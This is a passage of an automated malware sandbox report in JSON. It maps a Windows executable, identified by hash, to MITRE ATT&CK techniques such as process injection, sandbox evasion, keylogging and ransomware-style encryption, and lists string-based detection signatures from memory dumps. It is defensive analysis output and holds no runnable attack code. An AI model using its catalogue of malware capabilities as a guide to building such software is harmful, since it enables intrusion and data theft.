"attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Bootkit", "attck_id": "T1542.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542/003", "malicious_identifiers_count": 1, "parent": {"technique": "Pre-OS Boot", "attck_id": "T1542", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 16}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Device Driver Discovery", "attck_id": "T1652", "attck_id_wiki": "https://attack.mitre.org/techniques/T1652", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Archive via Library", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002", "informative_identifiers_count": 1, "parent": {"technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Standard Encoding", "attck_id": "T1132.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Multi-hop Proxy", "attck_id": "T1090.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090/003", "informative_identifiers_count": 1, "parent": {"technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Domain Generation Algorithms", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002", "informative_identifiers_count": 1, "parent": {"technique": "Dynamic Resolution", "attck_id": "T1568", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Exfiltration Over C2 Channel", "attck_id": "T1041", "attck_id_wiki": "https://attack.mitre.org/techniques/T1041", "suspicious_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\" in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\" in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\" in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676\" in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"Software\\Microsoft\\Office\" in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"\\REGISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" in Source: 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" in Source: 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"\\REGISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"\\REGISTRY\\MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"\\REGISTRY\\MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\" in Source: 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessW() Failed, err: %d\" (Indicator: \"CreateProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateProcessA() Failed, err: %d\" (Indicator: \"CreateProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateProcessW\" (Indicator: \"CreateProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryW\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "details too long to display", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.00D92000.00000002.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"User-Agent: %s\" (Indicator: \"user-agent: \"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-220", "type": 2, "relevance": 1, "name": "Contains ability to create/control drivers (API string)", "description": "Found reference to API \"DeviceIoControl\" (Indicator: \"DeviceIoControl\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72250000\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" loaded module \"KERNEL32\" at base 